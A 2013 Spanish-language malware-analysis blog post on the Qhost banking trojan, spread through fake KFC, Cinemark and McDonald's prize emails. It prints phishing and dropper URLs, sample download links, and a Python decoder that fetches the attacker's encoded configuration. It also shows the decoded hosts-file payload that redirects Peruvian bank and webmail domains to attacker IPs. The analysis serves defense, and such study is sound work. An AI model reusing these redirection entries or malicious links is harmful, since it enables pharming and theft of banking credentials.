martes, 19 de febrero de 2013

Troyano Qhost - Falso Premio KFC /  Falso Premio Cinemark

Nueva campaña del troyano Qhost analizado aquí, esta vez utilizando otro falso premio.

Utiliza codificación de datos para esconder la configuración del Pharming.
Actualmente afecta a varias entidades del Perú y varios sitios de correo electrónico.



Link : http://vale.kfcbuenisimo.com.ec.actualidadez.info/comida/ganadores/premio/c2ltb24uc2F5QGdheS5jb20NCg==

c2ltb24uc2F5QGdheS5jb20NCg== codificado en Base64  corresponde al correo de la victima del phishing.

Descarga con Malzilla:



Corresponde a un .zip con un .scr en su interior, con un Indice muy bajo en detecciones:


Analizando el .SCR se observa que utiliza PKZip para comprimir el ejecutable (malware).





Diagrama del encapsulado del malware.



Analisis en VT del malware extraído del .scr



Strings del malware:





El troyano descarga la configuración (codificada) del pharming desde: http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg

(Puedes encontrar el script en phyton para decodificarlo aquí.)


Pharming:


# Copyright (c) 1993-1999 Microsoft Corp.
#
# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.
#
# Este archivo contiene las asignaciones de las direcciones IP a los nombres de
# host. Cada entrada debe permanecer en una línea individual. La dirección IP
# debe ponerse en la primera columna, seguida del nombre de host correspondiente.
# La dirección IP y el nombre de host deben separarse con al menos un espacio.
#
# También pueden insertarse comentarios (como éste) en líneas individuales
# o a continuación del nombre de equipo indicándolos con el símbolo #
#
# Por ejemplo:
#
#      102.54.94.97     rhino.acme.com          # servidor origen
#       38.25.63.10     x.acme.com              # host cliente x


127.0.0.1       localhost 



142.11.192.81 viabcp.com
142.11.192.81 www.viabcp.com
142.11.192.81 zonasegura.viabcp.com
142.11.192.81 telecreditonp.bcp.com.pe
142.11.192.81 telecredito.bcp.com.pe
142.11.192.81 peb1.bbvanetlatam.com
142.11.192.81 bancofalabella.pe
142.11.192.81 www.bancofalabella.pe
142.11.192.81 interbank.com.pe
142.11.192.81 www.interbank.com.pe
142.11.192.81 netinterbank.com.pe
142.11.192.81 scotiabank.com.pe
142.11.192.81 www.scotiabank.com.pe
142.11.192.81 scotiaenlinea.scotiabank.com.pe
142.11.192.81 wiese.com.pe
142.11.192.81 www.wiese.com.pe
142.11.192.81 scotiaenlinea.wiese.com.pe
142.11.192.81 bws.com.pe
142.11.192.81 www.bws.com.pe
142.11.192.81 scotiaenlinea.bws.com.pe
142.11.192.81 bn.com.pe
142.11.192.81 www.bn.com.pe
142.11.192.81 zonasegura1.bn.com.pe
142.11.192.81 correoweb.terra.com.pe
142.11.192.81 correo.speedy.com.pe
142.11.192.81 gmail.com
142.11.192.81 www.gmail.com
142.11.192.81 mail.gmail.com
142.11.192.81 g.msn.com
142.11.192.81 www.g.msn.com
142.11.192.81 hotmail.com
142.11.192.81 www.hotmail.com
142.11.192.81 lives.com
142.11.192.81 login.lives.com
142.11.192.81 outlook.com
142.11.192.81 www.outlook.com
142.11.192.81 livez.com
142.11.192.81 login.livez.com



muestra: http://dl.dropbox.com/u/80008916/Qhost%2017-02-13l.rar



password = infected



NUEVO!!! 21-02-2013...............................................................................................................

Troyano como Falso Premio Cinemark

Continua la campaña para diseminar este troyano, esta vez utilizando otro mail Phishing.





Link de descarga:
http://sorteo.cinemark.com.servicez.info/cine/ganadores/premio/cHV0b2VscXVlbGVlQGhvdG1haWwuY29tDQo=


Analisis en VT del  Dropper:
https://www.virustotal.com/es/file/054b0be10ec82395f3fbadc02d09662d18fdd586b1cd60414ed5cfe51402837b/analysis/1361486196/


Malware:
https://www.virustotal.com/es/file/473be07617371299698a588900ab889472d27ebffd5d7f331f54975e54b22553/analysis/1361487160/



El troyano descarga la configuración (codificada) del pharming desde: http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg

(Puedes encontrar el script en phyton para decodificarlo aquí.)


PHARMING

142.11.192.81 viabcp.com
142.11.192.81 www.viabcp.com
142.11.192.81 zonasegura.viabcp.com
142.11.192.81 telecreditonp.bcp.com.pe
142.11.192.81 telecredito.bcp.com.pe
142.11.192.81 peb1.bbvanetlatam.com
142.11.192.81 financiero.com.pe
142.11.192.81 www.financiero.com.pe
142.11.192.81 bancofalabella.pe
142.11.192.81 www.bancofalabella.pe
142.11.192.81 interbank.com.pe
142.11.192.81 www.interbank.com.pe
142.11.192.81 netinterbank.com.pe
142.11.192.81 scotiabank.com.pe
142.11.192.81 www.scotiabank.com.pe
142.11.192.81 scotiaenlinea.scotiabank.com.pe
142.11.192.81 wiese.com.pe
142.11.192.81 www.wiese.com.pe
142.11.192.81 scotiaenlinea.wiese.com.pe
142.11.192.81 bws.com.pe
142.11.192.81 www.bws.com.pe
142.11.192.81 scotiaenlinea.bws.com.pe
142.11.192.81 bn.com.pe
142.11.192.81 www.bn.com.pe
142.11.192.81 zonasegura1.bn.com.pe
142.11.192.81 correoweb.terra.com.pe
142.11.192.81 correo.speedy.com.pe
142.11.192.81 gmail.com
142.11.192.81 www.gmail.com
142.11.192.81 mail.gmail.com
142.11.192.81 g.msn.com
142.11.192.81 www.g.msn.com
142.11.192.81 hotmail.com
142.11.192.81 www.hotmail.com
142.11.192.81 lives.com
142.11.192.81 login.lives.com
142.11.192.81 outlook.com
142.11.192.81 www.outlook.com
142.11.192.81 livez.com
142.11.192.81 login.livez.com





muestra: http://dl.dropbox.com/u/80008916/Qhost%2021-02-03.rar

passw = infected


Espero que las empresas afectadas reclamen la baja del siguiente sitio
http://noobster.info



No se que esperan.......como diría un amigo.... la vagancia no descansa....




NUEVO!!! 25-02-2013...............................................................................................................

Troyano como Falso Video Pornografico de Anne Malherbe

Continua la campaña para diseminar este troyano, esta vez utilizando otro mail Phishing.
El malware y el pharming es el mismo... mal por las entidades bancarias que no han hecho
nada para solucionar este tema, con esto no estoy diciendo que lean mi blog, sino que por 
lo evidenciado no cuentan con ningún sistema de detección temprana de este tipo 
de amenazas.



Link Descarga del Dropper:

http://premios.cinemark.com.servicez.info/cine/ganadores/premio/Y2h1cGFsYXB1dG9AZ2F5LmNvbQ==


Analisis del Dropper en V.T.:

https://www.virustotal.com/es/file/f3205ea3f7cee9b91ed22fa98f59066158d26277074554c83a0025bb17dc2854/analysis/1361795939/

Analisis del Malware en V.T.:

https://www.virustotal.com/es/file/f3205ea3f7cee9b91ed22fa98f59066158d26277074554c83a0025bb17dc2854/analysis/



PHARMING

# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.
#
# Este archivo contiene las asignaciones de las direcciones IP a los nombres de
# host. Cada entrada debe permanecer en una línea individual. La dirección IP
# debe ponerse en la primera columna, seguida del nombre de host correspondiente.
# La dirección IP y el nombre de host deben separarse con al menos un espacio.
#
# También pueden insertarse comentarios (como éste) en líneas individuales
# o a continuación del nombre de equipo indicándolos con el símbolo #
#
# Por ejemplo:
#
#      102.54.94.97     rhino.acme.com          # servidor origen
#       38.25.63.10     x.acme.com              # host cliente x
127.0.0.1       localhost 
142.11.192.81 viabcp.com
142.11.192.81 www.viabcp.com
142.11.192.81 zonasegura.viabcp.com
142.11.192.81 telecreditonp.bcp.com.pe
142.11.192.81 telecredito.bcp.com.pe
142.11.192.81 peb1.bbvanetlatam.com
142.11.192.81 financiero.com.pe
142.11.192.81 www.financiero.com.pe
142.11.192.81 bancofalabella.pe
142.11.192.81 www.bancofalabella.pe
142.11.192.81 interbank.com.pe
142.11.192.81 www.interbank.com.pe
142.11.192.81 netinterbank.com.pe
142.11.192.81 scotiabank.com.pe
142.11.192.81 www.scotiabank.com.pe
142.11.192.81 scotiaenlinea.scotiabank.com.pe
142.11.192.81 wiese.com.pe
142.11.192.81 www.wiese.com.pe
142.11.192.81 scotiaenlinea.wiese.com.pe
142.11.192.81 bws.com.pe
142.11.192.81 www.bws.com.pe
142.11.192.81 scotiaenlinea.bws.com.pe
142.11.192.81 bn.com.pe
142.11.192.81 www.bn.com.pe
142.11.192.81 zonasegura1.bn.com.pe
142.11.192.81 correoweb.terra.com.pe
142.11.192.81 correo.speedy.com.pe
142.11.192.81 gmail.com
142.11.192.81 www.gmail.com
142.11.192.81 mail.gmail.com
142.11.192.81 g.msn.com
142.11.192.81 www.g.msn.com
142.11.192.81 hotmail.com
142.11.192.81 www.hotmail.com
142.11.192.81 lives.com
142.11.192.81 login.lives.com
142.11.192.81 outlook.com
142.11.192.81 www.outlook.com
142.11.192.81 livez.com
142.11.192.81 login.livez.com5





Eso es todo por el momento.


@DkAvalanche   2013

miércoles, 13 de febrero de 2013

Troyano Qhost - Falso Regalo McVale de MC-Donald's 


Este troyano utiliza técnicas de cifrado del archivo de configuración del pharming para evitar la mirada de curiosos y despistar a los investigadores. Es igual al siguiente caso, el cual analizamos con Cryptool.



Falso Correo enviado por los defraudadores.






hxxxxtp://mcvalez.mcdonalds.pe.noticieroz.info/vale/sorteo/comida/SkdlcnJpZTE5OTFAaG90bWFpbC5jb20=


El link esta codificado en Base64 y tiene relación con el email de la victima.



Descarga



Nos descarga un .ZIP con un .SCR en el interior.


Icono del malware.






El ejecutable .SCR es un utilitario que descomprime otro zip que en su interior tiene el malware programado en VBasic



Extraemos el .Zip a mano recortando con el editor FlexHex.




Icono del malware.



Luego lo cargamos en el Olly para estudiar su comportamiento.



Strings interesantes:

0040445C   ASCII "URL",0
004044A9   PUSH winlogon.00402844                    UNICODE "/bmuht/segami/ofni.retsboon//:ptth"
00404A53   MOV EDX,winlogon.00402890                 UNICODE "live"
004064FD   PUSH winlogon.004028E4                    UNICODE "=yrtnuoc"
004065A0   MOV DWORD PTR SS:[EBP-74],winlogon.00402  UNICODE " host"
00406797   PUSH winlogon.00402924                    UNICODE "Revisar"
00406D6B   PUSH winlogon.00402960                    UNICODE "stsoh\cte\srevird\23metsys\"
004071B2   PUSH winlogon.00402A30                    UNICODE "php.atad/moc.lootpioeg//:ptth"
00407220   PUSH winlogon.00402A70                    UNICODE "/2"
0040724B   PUSH winlogon.00402A7C                    UNICODE "gpj."
004074AF   PUSH winlogon.00402B48                    UNICODE ""
0040754B   PUSH winlogon.00402B48                    UNICODE ""
00408855   PUSH winlogon.00402E88                    UNICODE "RegWrite"
00408E8E   MOV DWORD PTR SS:[EBP-98],winlogon.00402  UNICODE "00000000"
00408FBE   MOV ESI,winlogon.00402F0C                 UNICODE "0000"
004091E7   PUSH winlogon.00402F24                    UNICODE "ets"






Utilización de la función StrReverse para 


004044A9   PUSH winlogon.00402844                    UNICODE "/bmuht/segami/ofni.retsboon//:ptth"

http://noobster.info/images/thumb/   (HOST DEL PHARMING)


0040724B   PUSH winlogon.00402A7C                    UNICODE "gpj."

.jpg


00406D6B   PUSH winlogon.00402960                    UNICODE "stsoh\cte\srevird\23metsys\"

system32/drivers/etc/hosts



004071B2   PUSH winlogon.00402A30                    UNICODE "php.atad/moc.lootpioeg//:ptth"

http://geoiptool.com/data.php


004064FD   PUSH winlogon.004028E4                    UNICODE "=yrtnuoc"


country=

Del sitio de goiptool.com verifica de que pais se esta accediendo y dependiendo de esto arma la URL para descargar el Pharming


 lat="-34.5875" lng="-58.6725" city="Buenos Aires" country="Argentina" host="xxx.xxx.xx..x" ip="xxx.xxx.xxx"code="AR"/>




Así arma el URL para buscar la configuración del Pharming:

host del pharming /+ country +/ data en hexa /+ .jpg


Verificando, este Qhost afecta a Perú

http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg

En caso de fallar la Geoip en country pone el string Revisar

00406797   PUSH winlogon.00402924                    UNICODE "Revisar"



Vemos como la configuración esta codificada.





Como vimos en otra ocasión esta codificado con suma de bytes con una Key 07

Aquí un decente Script en Python para decodificar el archivo de configuración del troyano.

---------------------------------------------------------Python Script----------------------------------------------

import sys
from urllib import FancyURLopener
from random import choice
import string


url ='http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg';
ca = ''
salida = '';
user_agents = [
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
#    'Opera/9.25 (Windows NT 5.1; U; en)'
#    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19'
#    'Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'
]


def sumab(string):
    data = []
    for k in xrange(len(string)):
            se = ord(string[k])
            xx = (se - 07)
            data += [chr(xx)]
    return data

class MyOpener(FancyURLopener, object):
    version = choice(user_agents)

myopener = MyOpener()
source = myopener.open(url)
cadena = source.read()


salida = sumab(cadena);


for imprime in range(len(salida)):
    ca = ca + salida[imprime]
print ca


---------------------------------------------------------Python Script----------------------------------------------


Tomado la config http://noobster.info/images/thumb/Peru/2BC5F61EB.jpg
Obtenemos como Resultado:



# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.

#

# Este archivo contiene las asignaciones de las direcciones IP a los nombres de

# host. Cada entrada debe permanecer en una línea individual. La dirección IP

# debe ponerse en la primera columna, seguida del nombre de host correspondiente.

# La dirección IP y el nombre de host deben separarse con al menos un espacio.


#

# También pueden insertarse comentarios (como éste) en líneas individuales

# o a continuación del nombre de equipo indicándolos con el símbolo #

#

# Por ejemplo:

#

#      102.54.94.97     rhino.acme.com          # servidor origen

#       38.25.63.10     x.acme.com              # host cliente x


127.0.0.1       localhost 



199.59.58.37 viabcp.com
199.59.58.37 www.viabcp.com
199.59.58.37 zonasegura.viabcp.com
199.59.58.37 telecreditonp.bcp.com.pe
199.59.58.37 telecredito.bcp.com.pe
199.59.58.37 peb1.bbvanetlatam.com
199.59.58.37 bancofalabella.pe
199.59.58.37 www.bancofalabella.pe
199.59.58.37 interbank.com.pe
199.59.58.37 www.interbank.com.pe
199.59.58.37 netinterbank.com.pe
199.59.58.37 scotiabank.com.pe
199.59.58.37 www.scotiabank.com.pe
199.59.58.37 scotiaenlinea.scotiabank.com.pe
199.59.58.37 wiese.com.pe
199.59.58.37 www.wiese.com.pe
199.59.58.37 scotiaenlinea.wiese.com.pe
199.59.58.37 bws.com.pe
199.59.58.37 www.bws.com.pe
199.59.58.37 scotiaenlinea.bws.com.pe
199.59.58.37 bn.com.pe
199.59.58.37 www.bn.com.pe
199.59.58.37 zonasegura1.bn.com.pe
199.59.58.37 correoweb.terra.com.pe
199.59.58.37 correo.speedy.com.pe
199.59.58.37 gmail.com
199.59.58.37 www.gmail.com
199.59.58.37 mail.gmail.com
199.59.58.37 g.msn.com
199.59.58.37 www.g.msn.com
199.59.58.37 hotmail.com
199.59.58.37 www.hotmail.com
199.59.58.37 lives.com
199.59.58.37 login.lives.com
199.59.58.37 outlook.com
199.59.58.37 www.outlook.com
199.59.58.37 livez.com
199.59.58.37 login.livez.com



Por lo que les recomiendo a las entidades financieras y otros afectados pedir la baja del servicio:

http://noobster.info/


Domain ID:D47799647-LRMS
Domain Name:NOOBSTER.INFO
Created On:17-Sep-2012 08:24:10 UTC
Last Updated On:16-Nov-2012 20:30:52 UTC
Expiration Date:17-Sep-2013 08:24:10 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:563bb08ef02c9a8b
Registrant Name:WhoisGuard  Protected
Registrant Organization:WhoisGuard
Registrant Street1:11400 W. Olympic Blvd. Suite 200
Registrant Street2:
Registrant Street3:
Registrant City:Los Angeles
Registrant State/Province:CA
Registrant Postal Code:90064
Registrant Country:US
Registrant Phone: +1.6613102107
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:df2d1c638ea5af3a
Admin Name:WhoisGuard  Protected
Admin Organization:WhoisGuard
Admin Street1:11400 W. Olympic Blvd. Suite 200
Admin Street2:
Admin Street3:
Admin City:Los Angeles
Admin State/Province:CA
Admin Postal Code:90064
Admin Country:US
Admin Phone: +1.6613102107
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:563bb08ef02c9a8b
Billing Name:WhoisGuard  Protected
Billing Organization:WhoisGuard
Billing Street1:11400 W. Olympic Blvd. Suite 200
Billing Street2:
Billing Street3:
Billing City:Los Angeles
Billing State/Province:CA
Billing Postal Code:90064
Billing Country:US
Billing Phone: +1.6613102107
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:9614858ef02c9a8b
Tech Name:WhoisGuard  Protected
Tech Organization:WhoisGuard
Tech Street1:11400 W. Olympic Blvd. Suite 200
Tech Street2:
Tech Street3:
Tech City:Los Angeles
Tech State/Province:CA
Tech Postal Code:90064
Tech Country:US
Tech Phone: +1.6613102107
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS1.V7HOST.COM
Name Server:NS2.V7HOST.COM
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server:


Muestra: http://dl.dropbox.com/u/80008916/Qhost%2008-02-03.rar


password = infected

Eso es todo por el momento.


@DkAvalanche   2013




PD: Este es mi post Nro:


 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!